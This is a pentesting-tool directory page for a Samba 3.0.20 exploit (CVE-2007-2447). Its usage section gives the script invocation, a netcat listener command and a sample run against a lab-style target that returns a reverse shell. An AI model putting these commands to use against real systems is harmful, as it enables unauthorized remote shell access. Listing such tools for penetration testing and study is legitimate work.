Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2007-2447 — Samba 3.0.20 CVE-2007-2447 Exploit | Kitploit
Tools/GitHubGitHub/r3vpwnx/cve-2007-2447
Payload GenerationVulnerability AnalysisExploitationPenetration TestingRemote Access Tool
GitHubr3vpwnx/cve-2007-2447

CVE-2007-2447

Samba 3.0.20 CVE-2007-2447 Exploit

View Repository
3 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2007-2447

Samba 3.0.20 CVE-2007-2447 Exploit

root@kitploit:~
python3 smb3.0.20_exp.py -lh [localhost] -lp [local port] -t [target]

Create a Netcat listener

root@kitploit:~
nc -nlvp 4444

Run the script

root@kitploit:~
python3 smb3.0.20_exp.py -lh 10.10.16.18 -lp 4444 -t 10.10.10.3
image
Download Tool